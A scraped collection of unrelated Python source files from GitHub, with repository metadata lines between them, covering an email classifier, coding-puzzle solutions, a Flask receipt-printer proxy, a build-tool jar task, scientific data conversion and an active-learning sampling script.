open_file = open(test_filelist_filename, 'wb')
pickle.dump(file_list,open_file)
open_file.close()
# Create the dataframe
df = pd.DataFrame(data,columns=['Subject', 'Body'])
csv_path = file_path+'.csv'
df.to_csv(csv_path, index=False, header=True)
preprocess(csv_path=csv_path,test=True)
with open(csv_path, 'rb') as fh:
response = HttpResponse(fh.read(), content_type="text/csv")
response['Content-Disposition'] = 'inline; filename=' + os.path.basename(csv_path)
return response
return HttpResponse("DONE")
############################################################# ML TEST DATASET FUNCTION ###################################
def testml(request):
try:
data = pd.read_csv("Pre_Test.csv", encoding='utf-8')
data['Lemma Message'] = data['Lemma Subject'].astype(str) + " " + data['Lemma Body'].astype(str)
df = data[['Lemma Message']]
# retreve the tfidf model from disk
open_file = open(tfidf_file,'rb')
tfidf = pickle.load(open_file)
open_file.close()
# generate X_test
X_test = tfidf.transform(df['Lemma Message']).toarray()
model = pickle.load(open('Train_AI_Model', 'rb'))
# y_pred_proba = model.predict_proba(X_test)
y_pred = model.predict(X_test)
# Now y_pred contains numbers in ranges 0..number of categories
# retrieve the categories names
open_file = open(category_filename, 'rb')
cats = pickle.load(open_file)
open_file.close()
# Next retrieve the filenames from disk
open_file = open(test_filelist_filename, 'rb')
file_list = pickle.load(open_file)
open_file.close()
df_dat = []
for idx, f in enumerate(file_list):
temp = [f, cats[y_pred[idx]]]
df_dat.append(temp)
df = pd.DataFrame(df_dat, columns=['Filename', 'Category'])
df.to_csv('Test_Output.csv', index=False, header=True)
return render(request, 'home2.html', {'train_success': True ,'test_done': True, 'output': df_dat})
except:
return HttpResponse("<h1>FORBIDDEN!</h1> <h2>First upload the Test Dataset.</h2>")
############################################################# DL TEST DATASET FUNCTION ###################################
model = None
def testdl(request):
try:
df = pd.read_csv("Pre_Test.csv", encoding='utf-8')
except:
return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Upload A Zip File Containing The Test DataSet</h2>")
else:
df = df.sample(frac=1)
# Vocabulary and number of words
vocab = 10000
sequence_length = 40
word = 10
sentences = int(sequence_length / word)
document = 8 #####
units = 64
df1 = df[['Lemma Body']]
# Prepare Tokenizer
t = Tokenizer()
wors = list(df1['Lemma Body'])
t.fit_on_texts(wors) #
vocab_size = len(t.word_index) + 1
# integer encode the documents
encoded_docs = t.texts_to_sequences(wors)
# pad documents to a max length of 40 words
padded_docs = pad_sequences(encoded_docs, maxlen=sequence_length, padding='post')
"""**Reshape to (Documents X Sentences X Words)**"""
a = tf.reshape(padded_docs, (df.shape[0], int(sequence_length/10), 10))
x_test = a[:]
batch = document
global model
# try:
if model is None:
model = keras.models.load_model('model_name')
# except:
# return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Train The Model First</h2>")
# else:
result = np.zeros((1, 3))
# result = model.predict(a[:])
for i in range(0, int(x_test.shape[0] / batch)):
predictions = model.predict(x_test[batch * i:batch * (i + 1)])
result = np.vstack((result, predictions))
result = np.delete(result, (0), axis=0)
b = pd.DataFrame(result, columns=['MDU', 'Retirements', 'Transfers'])
b = pd.DataFrame(b.idxmax(axis=1), columns=['Predicted'])
open_file = open(category_filename, 'rb')
cats = pickle.load(open_file)
open_file.close()
# Next retrieve the filenames from disk
open_file = open(test_filelist_filename, 'rb')
file_list = pickle.load(open_file)
open_file.close()
df_dat = []
for idx, f in enumerate(file_list):
if idx >= int(b.shape[0]/batch)*batch:
break
temp = [f, b.iloc[idx][0]]
df_dat.append(temp)
df = pd.DataFrame(df_dat, columns=['Filename', 'Category'])
df.to_csv('Test_Output.csv', index=False, header=True)
return render(request, 'home.html', {'test_success': True, 'test_done': True, 'output': df_dat})
############################################################# DOWNLOAD TEST OUTPUT FUNCTION ##########################
def download(request):
try:
fh = open('Test_Output.csv', 'rb')
response = HttpResponse(fh.read(), content_type="text/csv")
response['Content-Disposition'] = 'inline; filename=Test_Output.csv'
return response
except:
return HttpResponse("<h1>FORBIDDEN!</h1> <h2>Train the model first.</h2>")
| TheThinker01/AiEmailClassifier | server/views.py | views.py | py | 24,603 | python | en | code | 1 | github-code | 36 |
28068367502 | import sys
input = sys.stdin.readline
def lower_bound(arr, start, end, n):
while start < end:
mid = (start + end) // 2
if arr[mid] < n:
start = mid + 1
else:
end = mid
return end
n = int(input())
a = list(map(int, input().split()))
answer = []
for num in a:
if len(answer) == 0:
answer.append(num)
if answer[-1] < num:
answer.append(num)
else:
idx = lower_bound(answer,0,len(answer)-1,num)
answer[idx] = num
print(len(answer)) | hwanginbeom/algorithm_study | 1.algorithm_question/9.Binary_Search/114.Binary_Search_gyeonghyeon.py | 114.Binary_Search_gyeonghyeon.py | py | 533 | python | en | code | 3 | github-code | 36 |
43552330299 | import pytest
from rest_framework import status
from tests.factories import JobFactory
@pytest.mark.django_db
def test_selection_create(client, user_access_token):
user, access_token = user_access_token
job_list = JobFactory.create_batch(10)
data = {
"name": "Название подборки",
"items": [job.pk for job in job_list]
}
expected_data = {
"id": 1,
"owner": user.username,
"name": "Название подборки",
"items": [job.pk for job in job_list]
}
response = client.post("/selection/", data=data, HTTP_AUTHORIZATION=f"Bearer {access_token}")
assert response.status_code == status.HTTP_201_CREATED
assert response.data == expected_data
| VyacheslavTim/Lesson31 | tests/selection/selection_test.py | selection_test.py | py | 750 | python | en | code | 0 | github-code | 36 |
25947127488 | # Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def deepestLeavesSum(self, root: TreeNode) -> int:
max_sum = 0
stack = [root]
while stack:
values = []
max_sum = 0
while stack:
root = stack.pop()
if root.left:
values.append(root.left)
if root.right:
values.append(root.right)
max_sum += root.val
stack.extend(values)
return max_sum
| dzaytsev91/leetcode-algorithms | medium/1302_deepest_leaves_sum.py | 1302_deepest_leaves_sum.py | py | 669 | python | en | code | 2 | github-code | 36 |
40290054155 | from flask import Flask, request, jsonify
from flask_cors import CORS
import re
from escpos.printer import Network
import base64
import os
app = Flask(__name__)
CORS(app)
@app.route('/text/<addr>', methods=['GET','POST'])
def print_text(addr):
data, printer, message = setup_for_command(request, addr)
if message:
return message
printer.text(data)
cut(printer=printer)
return jsonify(message="Success!", code=200)
@app.route('/block/<addr>', methods=['GET','POST'])
def print_block(addr):
data, printer, message = setup_for_command(request, addr)
if message:
return message
printer.block_text(data)
cut(printer=printer)
return jsonify(message="Success!", code=200)
@app.route('/img/<addr>', methods=['GET','POST'])
def print_img(addr):
data, printer, message = setup_for_command(request, addr, data_type="img")
if message:
return message
printer.image(data)
cut(printer=printer)
return jsonify(message="Success!", code=200)
@app.route('/status/<addr>', methods=['GET'])
def print_status(addr):
try:
cut(addr=addr, request=request)
return jsonify(message="Success!", code=200)
except:
return jsonify(message="Error!", code=500)
@app.route('/cut/<addr>', methods=['GET'])
def print_cut(addr):
return cut(addr=addr, request=request)
def cut(printer=False, addr=False, request=False):
if printer:
return printer.cut()
data, printer, message = setup_for_command(request, addr)
printer.cut()
return jsonify(message="Success!", code=200)
def setup_for_post_command(request, addr, data_type="txt"):
if request.method != 'POST':
return False, False, jsonify(message="This should be used with POST method.", code=405)
return setup_for_command(request, addr, data_type)
def setup_for_post_command(request, addr, data_type="txt"):
if request.method != 'GET':
return False, False, jsonify(message="This should be used with GET method.", code=405)
return setup_for_command(request, addr, data_type)
def setup_for_command(request, addr, data_type="txt"):
if not validate_address(addr):
return False, False, jsonify(message="Not a valid url or ip address.", code=406)
data = get_data(request.data, data_type)
printer = create_network(addr)
if not printer:
return False, False, jsonify(message="Error ocurred", code=504)
app.logger.info(data or "no data")
if printer and not data:
try:
printer.cut()
except:
return False, False, jsonify(message="No connection could be made to the address.", code=406)
return False, False, jsonify(message="Printer found on ip: %s" % addr, code=202)
return data, printer, False
def get_data(data, data_type):
try:
if data_type == "txt":
return str(data.decode('utf-8'))
app.logger.info(data)
imgdata = base64.b64decode(data)
dir_path = os.path.dirname(os.path.realpath(__file__))
filename = dir_path + "/temp_receipt.jpg"
with open(filename, 'wb') as f:
app.logger.info(filename)
f.write(imgdata)
return filename
except:
return False
def create_network(addr):
try:
printer = Network(addr)
return printer
except TimeoutError:
return False
def validate_address(addr):
regex = re.compile(
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
r'localhost|' #localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
return re.match(regex, addr)
if __name__ == '__main__':
app.run(debug=True, host="0.0.0.0") | Christophersuazop/printer_proxy | main.py | main.py | py | 3,827 | python | en | code | 0 | github-code | 36 |
37241864515 | #!/usr/bin/python3
"""
Run this with:
python3 -m http.server --cgi
"""
import cgitb
cgitb.enable(format="text")
from helper import get_input, json
# user_input = get_input()
test_data = {
"firstName": "John",
"lastName": "Smith",
"age": 27
}
# Will give you JSON output in the console
print(json.dumps(test_data))
'''
if user_input:
print("User-input", user_input)
else:
print(test_data)
''' | Alexico1969/Points-Sandbox | cgi-bin/api.py | api.py | py | 415 | python | en | code | 0 | github-code | 36 |
35396554268 | from __future__ import (nested_scopes, generators, division, absolute_import, with_statement,
print_function, unicode_literals)
from abc import abstractmethod, abstractproperty
from contextlib import contextmanager
import os
import tempfile
from twitter.common.collections import maybe_list
from twitter.common.lang import AbstractClass, Compatibility
from pants.backend.jvm.targets.jvm_binary import Duplicate, Skip, JarRules
from pants.backend.jvm.tasks.nailgun_task import NailgunTask
from pants.base.exceptions import TaskError
from pants.base.workunit import WorkUnit
from pants.java.jar.manifest import Manifest
from pants.util.contextutil import temporary_dir
class Jar(object):
"""Encapsulates operations to build up or update a jar file.
Upon construction the jar is conceptually opened for writes. The write methods are called to
add to the jar's contents and then changes are finalized with a call to close. If close is not
called the staged changes will be lost.
"""
class Error(Exception):
"""Indicates an error creating or updating a jar on disk."""
class Entry(AbstractClass):
"""An entry to be written to a jar."""
def __init__(self, dest):
self._dest = dest
@property
def dest(self):
"""The destination path of the entry in the jar."""
return self._dest
@abstractmethod
def materialize(self, scratch_dir):
"""Materialize this entry's source data into a filesystem path.
:param string scratch_dir: A temporary directory that may be used to do any work required
to materialize the entry as a source file. The caller is responsible for cleaning up
`scratch_dir` after the jar is closed.
:returns: The path to the source data.
"""
class FileSystemEntry(Entry):
"""An entry backed by an existing file on disk."""
def __init__(self, src, dest=None):
super(Jar.FileSystemEntry, self).__init__(dest)
self._src = src
def materialize(self, _):
return self._src
class MemoryEntry(Entry):
"""An entry backed by an in-memory sequence of bytes."""
def __init__(self, dest, contents):
super(Jar.MemoryEntry, self).__init__(dest)
self._contents = contents
def materialize(self, scratch_dir):
fd, path = tempfile.mkstemp(dir=scratch_dir)
try:
os.write(fd, self._contents)
finally:
os.close(fd)
return path
def __init__(self):
self._entries = []
self._jars = []
self._manifest = None
self._main = None
self._classpath = None
def main(self, main):
"""Specifies a Main-Class entry for this jar's manifest.
:param string main: a fully qualified class name
"""
if not main or not isinstance(main, Compatibility.string):
raise ValueError('The main entry must be a non-empty string')
self._main = main
def classpath(self, classpath):
"""Specifies a Class-Path entry for this jar's manifest.
:param list classpath: a list of paths
"""
self._classpath = maybe_list(classpath)
def write(self, src, dest=None):
"""Schedules a write of the file at ``src`` to the ``dest`` path in this jar.
If the ``src`` is a file, then ``dest`` must be specified.
If the ``src`` is a directory then by default all descendant files will be added to the jar as
entries carrying their relative path. If ``dest`` is specified it will be prefixed to each
descendant's relative path to form its jar entry path.
:param string src: the path to the pre-existing source file or directory
:param string dest: the path the source file or directory should have in this jar
"""
if not src or not isinstance(src, Compatibility.string):
raise ValueError('The src path must be a non-empty string, got %s of type %s.'
% (src, type(src)))
if dest and not isinstance(dest, Compatibility.string):
raise ValueError('The dest entry path must be a non-empty string, got %s of type %s.'
% (dest, type(dest)))
if not os.path.isdir(src) and not dest:
raise self.Error('Source file %s must have a jar destination specified' % src)
self._add_entry(self.FileSystemEntry(src, dest))
def writestr(self, path, contents):
"""Schedules a write of the file ``contents`` to the given ``path`` in this jar.
:param string path: the path to write the contents to in this jar
:param string contents: the raw byte contents of the file to write to ``path``
"""
if not path or not isinstance(path, Compatibility.string):
raise ValueError('The path must be a non-empty string')
if contents is None or not isinstance(contents, Compatibility.bytes):
raise ValueError('The contents must be a sequence of bytes')
self._add_entry(self.MemoryEntry(path, contents))
def _add_entry(self, entry):
if Manifest.PATH == entry.dest:
self._manifest = entry
else:
self._entries.append(entry)
def writejar(self, jar):
"""Schedules all entries from the given ``jar``'s to be added to this jar save for the manifest.
:param string jar: the path to the pre-existing jar to graft into this jar
"""
if not jar or not isinstance(jar, Compatibility.string):
raise ValueError('The jar path must be a non-empty string')
self._jars.append(jar)
@contextmanager
def _render_jar_tool_args(self):
args = []
if self._main:
args.append('-main=%s' % self._main)
if self._classpath:
args.append('-classpath=%s' % ','.join(self._classpath))
with temporary_dir() as stage_dir:
if self._manifest:
args.append('-manifest=%s' % self._manifest.materialize(stage_dir))
if self._entries:
def as_cli_entry(entry):
src = entry.materialize(stage_dir)
return '%s=%s' % (src, entry.dest) if entry.dest else src
args.append('-files=%s' % ','.join(map(as_cli_entry, self._entries)))
if self._jars:
args.append('-jars=%s' % ','.join(self._jars))
yield args
class JarTask(NailgunTask):
"""A baseclass for tasks that need to create or update jars.
All subclasses will share the same underlying nailgunned jar tool and thus benefit from fast
invocations.
"""
_CONFIG_SECTION = 'jar-tool'
_JAR_TOOL_CLASSPATH_KEY = 'jar_tool'
@staticmethod
def _flag(bool_value):
return 'true' if bool_value else 'false'
_DUPLICATE_ACTION_TO_NAME = {
Duplicate.SKIP: 'SKIP',
Duplicate.REPLACE: 'REPLACE',
Duplicate.CONCAT: 'CONCAT',
Duplicate.FAIL: 'THROW',
}
@classmethod
def _action_name(cls, action):
name = cls._DUPLICATE_ACTION_TO_NAME.get(action)
if name is None:
raise ValueError('Unrecognized duplicate action: %s' % action)
return name
def __init__(self, *args, **kwargs):
super(JarTask, self).__init__(*args, **kwargs)
self.set_distribution(jdk=True)
# TODO(John Sirois): Consider poking a hole for custom jar-tool jvm args - namely for Xmx
# control.
self.register_jvm_tool_from_config(self._JAR_TOOL_CLASSPATH_KEY, self.context.config,
ini_section=self._CONFIG_SECTION,
ini_key='bootstrap-tools',
default=['//:jar-tool'])
@property
def config_section(self):
return self._CONFIG_SECTION
def prepare(self, round_manager):
round_manager.require_data('resources_by_target')
round_manager.require_data('classes_by_target')
@contextmanager
def open_jar(self, path, overwrite=False, compressed=True, jar_rules=None):
"""Yields a Jar that will be written when the context exits.
:param string path: the path to the jar file
:param bool overwrite: overwrite the file at ``path`` if it exists; ``False`` by default; ie:
update the pre-existing jar at ``path``
:param bool compressed: entries added to the jar should be compressed; ``True`` by default
:param jar_rules: an optional set of rules for handling jar exclusions and duplicates
"""
jar = Jar()
try:
yield jar
except jar.Error as e:
raise TaskError('Failed to write to jar at %s: %s' % (path, e))
with jar._render_jar_tool_args() as args:
if args: # Don't build an empty jar
args.append('-update=%s' % self._flag(not overwrite))
args.append('-compress=%s' % self._flag(compressed))
jar_rules = jar_rules or JarRules.default()
args.append('-default_action=%s' % self._action_name(jar_rules.default_dup_action))
skip_patterns = []
duplicate_actions = []
for rule in jar_rules.rules:
if isinstance(rule, Skip):
skip_patterns.append(rule.apply_pattern)
elif isinstance(rule, Duplicate):
duplicate_actions.append('%s=%s' % (rule.apply_pattern.pattern,
self._action_name(rule.action)))
else:
raise ValueError('Unrecognized rule: %s' % rule)
if skip_patterns:
args.append('-skip=%s' % ','.join(p.pattern for p in skip_patterns))
if duplicate_actions:
args.append('-policies=%s' % ','.join(duplicate_actions))
args.append(path)
jvm_args = self.context.config.getlist('jar-tool', 'jvm_args', default=['-Xmx64M'])
self.runjava(self.tool_classpath(self._JAR_TOOL_CLASSPATH_KEY),
'com.twitter.common.jar.tool.Main',
jvm_options=jvm_args,
args=args,
workunit_name='jar-tool',
workunit_labels=[WorkUnit.TOOL, WorkUnit.JVM, WorkUnit.NAILGUN])
class JarBuilder(AbstractClass):
"""A utility to aid in adding the classes and resources associated with targets to a jar."""
@staticmethod
def _write_agent_manifest(agent, jar):
# TODO(John Sirois): refactor an agent model to support 'Boot-Class-Path' properly.
manifest = Manifest()
manifest.addentry(Manifest.MANIFEST_VERSION, '1.0')
if agent.premain:
manifest.addentry('Premain-Class', agent.premain)
if agent.agent_class:
manifest.addentry('Agent-Class', agent.agent_class)
if agent.can_redefine:
manifest.addentry('Can-Redefine-Classes', 'true')
if agent.can_retransform:
manifest.addentry('Can-Retransform-Classes', 'true')
if agent.can_set_native_method_prefix:
manifest.addentry('Can-Set-Native-Method-Prefix', 'true')
jar.writestr(Manifest.PATH, manifest.contents())
@abstractproperty
def _context(self):
"""Implementations must supply a context."""
def add_target(self, jar, target, recursive=False):
"""Adds the classes and resources for a target to an open jar.
:param jar: An open jar to add to.
:param target: The target to add generated classes and resources for.
:param bool recursive: `True` to add classes and resources for the target's transitive
internal dependency closure.
:returns: The list of targets that actually contributed classes or resources or both to the
jar.
"""
classes_by_target = self._context.products.get_data('classes_by_target')
resources_by_target = self._context.products.get_data('resources_by_target')
targets_added = []
def add_to_jar(tgt):
target_classes = classes_by_target.get(tgt)
target_resources = []
# TODO(pl): https://github.com/pantsbuild/pants/issues/206
resource_products_on_target = resources_by_target.get(tgt)
if resource_products_on_target:
target_resources.append(resource_products_on_target)
if tgt.has_resources:
target_resources.extend(resources_by_target.get(r) for r in tgt.resources)
if target_classes or target_resources:
targets_added.append(tgt)
def add_products(target_products):
if target_products:
for root, products in target_products.rel_paths():
for prod in products:
jar.write(os.path.join(root, prod), prod)
add_products(target_classes)
for resources_target in target_resources:
add_products(resources_target)
if tgt.is_java_agent:
self._write_agent_manifest(tgt, jar)
if recursive:
target.walk(add_to_jar)
else:
add_to_jar(target)
return targets_added
def prepare_jar_builder(self):
"""Prepares a ``JarTask.JarBuilder`` for use during ``execute``.
This method should be called during task preparation to ensure the classes and resources needed
for jarring targets are mapped by upstream tasks that generate these.
"""
class PreparedJarBuilder(self.JarBuilder):
@property
def _context(me):
return self.context
return PreparedJarBuilder()
| fakeNetflix/square-repo-pants | src/python/pants/backend/jvm/tasks/jar_task.py | jar_task.py | py | 12,978 | python | en | code | 0 | github-code | 36 |
13348205900 | import dpnp.config as config
# from dpnp.dparray import dparray
from dpnp.dpnp_array import dpnp_array
import numpy
import dpctl.tensor as dpt
if config.__DPNP_OUTPUT_DPCTL__:
try:
"""
Detect DPCtl availability to use data container
"""
import dpctl.tensor as dpctl
except ImportError:
"""
No DPCtl data container available
"""
config.__DPNP_OUTPUT_DPCTL__ = 0
__all__ = [
"asarray",
"empty",
]
def asarray(x1,
dtype=None,
copy=False,
order="C",
device=None,
usm_type=None,
sycl_queue=None):
"""Converts `x1` to `dpnp_array`."""
if isinstance(x1, dpnp_array):
x1_obj = x1.get_array()
else:
x1_obj = x1
array_obj = dpt.asarray(x1_obj,
dtype=dtype,
copy=copy,
order=order,
device=device,
usm_type=usm_type,
sycl_queue=sycl_queue)
return dpnp_array(array_obj.shape, buffer=array_obj, order=order)
def empty(shape,
dtype="f8",
order="C",
device=None,
usm_type="device",
sycl_queue=None):
"""Creates `dpnp_array` from uninitialized USM allocation."""
array_obj = dpt.empty(shape,
dtype=dtype,
order=order,
device=device,
usm_type=usm_type,
sycl_queue=sycl_queue)
return dpnp_array(array_obj.shape, buffer=array_obj, order=order)
| LukichevaPolina/dpnp | dpnp/dpnp_container.py | dpnp_container.py | py | 1,686 | python | en | code | null | github-code | 36 |
7424080764 | from plot_cryptosystems import plot_cryptosystems_single_dim, sns
from cryptosystems import SIGN_DF, max_abs_scaler, np
import matplotlib
df = SIGN_DF
p = sns.color_palette("Paired")
sns.set(context='paper', palette=sns.color_palette("Paired"))
sns.set_style(sns.axes_style("ticks"),
{'axes.grid': True})
df = df[df['Level'] == 3]
df['test'] = np.where(df['ratio_data_to_cycles']<1, -1, df['ratio_data_to_cycles']**2)/df['ratio_data_to_cycles']
df= df.reset_index(drop=True)
#df = df.sort_values(['Algorithm','Total Cost'])
import matplotlib.pyplot as plt
g=sns.barplot(data=df, x='Cipher', y='test',color=p[0])
for item in g.get_xticklabels():
item.set_rotation(90)
#g.set_yscale("log")
g.set(xlabel='', ylabel='Bytes/Cycles')
#plt.show()
#plt.savefig('loes20/Dokumentation/Latex/Bilder/plot_bar_ratio_comp_sign.pdf')
| crest42/ma | loes20/Dokumentation/src/plot_bar_ratio_cycles_bytes_signature.py | plot_bar_ratio_cycles_bytes_signature.py | py | 840 | python | en | code | 0 | github-code | 36 |
22209534047 | # -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
"""
import logging
from subprocess import Popen
from os import devnull
try:
from functools import reduce
except:
pass
def get_time_info(state):
if "#" in state:
state,time = state.split("#")
begin,end = time.split("-")
length = float(end)-float(begin)
end = float(end)
begin = float(begin)
newstate = [state,
float(begin),
float(end),
float(length)]
else:
newstate = [state, float(0), float(0), float(0)]
return newstate
def stripmac(state,mac):
if mac in state:
state = state.replace(mac, "")
state = state.strip()
if "playlist" in state:
state = state.replace("playlist", "")
state = state.strip()
else:
logging.error("MAC address not in telnet comm: %s", state)
return state
def check_required():
nulfp = open(devnull, "w")
for bin in ['sox', 'flac', 'lame', 'play', 'amixer']:
check = Popen(['which', bin], stdout=nulfp.fileno(), stderr=nulfp.fileno()).wait()
if not check==0:
logging.critical("Neccesary %s program not found on your system", bin)
return False
return True
def flac_time(t):
# adapted from Paul McGuire
# http://stackoverflow.com/questions/1384406/python-convert-seconds-to-hhmmss
# flac wants mm:ss.ms
return "%02d:%02d.%03d" % \
reduce(lambda ll,b : divmod(ll[0],b) + ll[1:],
[(t*1000,), 1000, 60])
def sox_time(t):
# idem as flac_time
# but sox wants hh:mm:ss.ms
return "%02d:%02d:%02d.%03d" % \
reduce(lambda ll,b : divmod(ll[0],b) + ll[1:],
[(t*1000,),1000,60,60])
| terual/sbcc | module/functions.py | functions.py | py | 2,415 | python | en | code | 2 | github-code | 36 |
27049180203 | from datetime import datetime
from django.core.management.base import BaseCommand
from django.utils.timezone import now
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from django.utils.translation import gettext as _
from imap_tools import MailBox, AND
from filebrowser.base import FileObject
from blog.models import Article
from pages.models import GalleryImage
from users.models import User
def process_message(message, usr):
msg = message.text
d = {'title': _('TITLE['), 'intro': _('DESCRIPTION['),
'body': _('TEXT['), 'date': _('DATE['),
'tags': _('CATEGORIES['), 'notice': _('NOTICE[')}
for key, value in d.items():
msg = msg.replace(value, '')
d[key] = msg.split(']', 1)[0].replace('\r\n', '')
msg = msg.split(']', 1)[1]
try:
d['date'] = datetime.strptime(d['date'], '%d/%m/%y')
except:
d['date'] = now()
post = Article(title=d['title'], intro=d['intro'], body=d['body'],
date=d['date'], tags=d['tags'], author=usr, notice=d['notice'] )
try:
post.save()
except:
return
for att in message.attachments: # list: [Attachment objects]
file = SimpleUploadedFile(att.filename, att.payload,
att.content_type)
position = att.filename.split('-', 1)[0]
caption = att.filename.split('-', 1)[1]
caption = caption.rsplit('.', 1)[0]
instance = GalleryImage(post_id=post.uuid, image=file,
position=position, caption=caption)
#save the instance and upload the file
instance.save()
#update the filebrowse field
instance.fb_image = FileObject(str(instance.image))
instance.save()
def do_command():
if not settings.FETCH_EMAILS:
return
HOST = settings.IMAP_HOST
USER = settings.IMAP_USER
PASSWORD = settings.IMAP_PWD
PORT = settings.IMAP_PORT
FROM = settings.IMAP_FROM
with MailBox(HOST).login(USER, PASSWORD, 'INBOX') as mailbox:
for message in mailbox.fetch(AND(seen=False, subject=_('articles'), ),
mark_seen=True):
try:
usr = User.objects.get(email=message.from_)
if not usr.has_perm('blog.add_article'):
continue
except:
continue
process_message(message, usr)
class Command(BaseCommand):
def handle(self, *args, **options):
do_command()
| andywar65/project_repo | blog/management/commands/fetch_article_emails.py | fetch_article_emails.py | py | 2,479 | python | en | code | 2 | github-code | 36 |
2063174381 | # -*- coding: utf-8 -*-
"""
@title: test_convert_spectra.py
@description: Example Python script to test the spectra data converter and to test reloading the converted spectra data
@author: chrisarcadia
@created: 2018/10/26
"""
import Bruker
import matplotlib.pyplot as pyplot
import h5py
import numpy
# Convert a data file
try:
input_filename = r'C:\Users\ChrisTow\Desktop\Examples\single\Mix_1_100_1.d';
output_filename = r'C:\Users\ChrisTow\Desktop\Converted\single\Mix_1_100_1.hdf5';
settings = Bruker.get_measurement_settings(input_filename);
positions = settings['positions'];
Bruker.convert_settings(output_filename, settings);
Bruker.convert_data_spectra(input_filename,output_filename,settings);
converted = 1;
except:
converted = 0; # do nothing if file already exists
# Load the converted data
hf = h5py.File(output_filename, 'r');
spec = hf.get('spectra/');
index = 0;
mz = numpy.array(spec['mass_to_charge'][index,:]);
signal = numpy.array(spec['signal'][index,:]);
info = {}
for k in spec.attrs.keys():
info.update({k:spec.attrs[k]});
hf.close();
print('Data Info:')
print(info);
# Plot one of the spectra
pyplot.plot(mz,signal, 'bo', markersize=1)
pyplot.ylabel('Signal')
pyplot.xlabel('M/Z')
pyplot.grid(True)
pyplot.show()
| scale-lab/AcidBaseNetworks | simulations/chemcpupy/automation/Bruker/test_convert_spectra.py | test_convert_spectra.py | py | 1,382 | python | en | code | 0 | github-code | 36 |
72084597543 | from setuptools import setup, find_packages
with open("requirements.txt") as f:
content = f.readlines()
requirements = [x.strip() for x in content if "git+" not in x]
setup(name='chord-cleaning',
description='creating a set of standardized chords from data',
install_requires=requirements,
packages=find_packages(),)
| emilycardwell/chord-cleaning | setup.py | setup.py | py | 341 | python | en | code | 0 | github-code | 36 |
4000738437 | import argparse
import math
from pathlib import Path
import random
import sys
import numpy as np
import pandas as pd
TRAIN_POOL_FILEPATH = "../../outputs/data_generation/train_pool.tsv"
TRAIN_FILEPATH_FS = "../../outputs/data_generation/{}/run_{}/round_{}/train.tsv"
TO_PREDICT_FILEPATH_FS = "../../outputs/data_generation/{}/run_{}/round_{}/to_predict.tsv"
PREDICTED_FILEPATH_FS = "../../outputs/data_generation/{}/run_{}/round_{}/predicted.tsv"
STRATIFIED_LOG_FILEPATH_FS = "../../outputs/data_generation/{}/run_{}/round_{}/stratified_log.txt"
STRATIFIED_NUM_BINS = 10
SAMPLING_STRATEGIES = [
"certain_pos",
"uncertain",
"stratified",
"random",
]
def parse_argument() -> argparse.Namespace:
parser = argparse.ArgumentParser(description="Generate the first version of annotation.")
parser.add_argument(
"--random_state",
type=int,
help="Set random state.",
)
parser.add_argument(
"--sampling_strategy",
type=str,
required=True,
help="Sampling strategy to use (stratified|certain_pos|uncertain).",
)
parser.add_argument(
"--run",
type=int,
required=True,
help="Specify which run this is for.",
)
parser.add_argument(
"--round",
type=int,
required=True,
help="Current round.",
)
parser.add_argument(
"--total_rounds",
type=int,
required=True,
help="Total number of rounds.",
)
parser.add_argument(
"--train_pool_filepath",
type=str,
default=TRAIN_POOL_FILEPATH,
help=f"Training pool filepath. (Default: {TRAIN_POOL_FILEPATH})",
)
args = parser.parse_args()
return args
def _drop_duplicates():
pass
def main():
args = parse_argument()
if args.sampling_strategy not in SAMPLING_STRATEGIES:
raise ValueError(f"Invalid sampling startegy: {args.sampling_strategy}")
print(f"***** {args.sampling_strategy}|run_{args.run}|round_{args.round} START *****")
if args.random_state:
random.seed(args.random_state)
df_train_pool = pd.read_csv(args.train_pool_filepath, sep='\t')
df_train_pool = df_train_pool.sample(frac=1, random_state=args.random_state)
print(f"Train pool shape: {df_train_pool.shape[0]}")
num_train_per_round = math.ceil(df_train_pool.shape[0] / args.total_rounds)
print(f"Number of training data per round: {num_train_per_round}")
train_filepath = TRAIN_FILEPATH_FS.format(
args.sampling_strategy, args.run, args.round)
to_predict_filepath = TO_PREDICT_FILEPATH_FS.format(
args.sampling_strategy, args.run, args.round)
Path(train_filepath).parent.mkdir(parents=True, exist_ok=True)
Path(to_predict_filepath).parent.mkdir(parents=True, exist_ok=True)
#
if args.round == 1:
df_train = df_train_pool[:num_train_per_round]
df_to_predict = df_train_pool[num_train_per_round:]
print(f"Training data shape: {df_train.shape[0]}")
print(f"To predict data shape: {df_to_predict.shape[0]}")
print(f"Saving training data to '{train_filepath}'")
df_train.to_csv(train_filepath, sep='\t', index=False)
print(f"Saving to_predict data to '{to_predict_filepath}'")
df_to_predict.to_csv(to_predict_filepath, sep='\t', index=False)
else:
predicted_filepath = PREDICTED_FILEPATH_FS.format(
args.sampling_strategy, args.run, args.round-1)
df_predicted = pd.read_csv(predicted_filepath, sep='\t', keep_default_na=False)
df_predicted.sort_values("prob", ascending=False, inplace=True)
print(f"Predicted '{predicted_filepath}' size: {df_predicted.shape[0]}")
prev_train_filepath = TRAIN_FILEPATH_FS.format(
args.sampling_strategy, args.run, args.round-1)
df_train = pd.read_csv(prev_train_filepath, sep='\t', keep_default_na=False)
print(f"Previous training data '{prev_train_filepath}' size: {df_train.shape[0]}")
if args.sampling_strategy == "certain_pos":
df_train_new = df_predicted[:num_train_per_round].copy()
df_to_predict = df_predicted[num_train_per_round:].copy()
elif args.sampling_strategy == "uncertain":
df_predicted["uncertainty"] = df_predicted["prob"].apply(lambda x: np.min([1-x, x]))
df_predicted.sort_values("uncertainty", ascending=False, inplace=True)
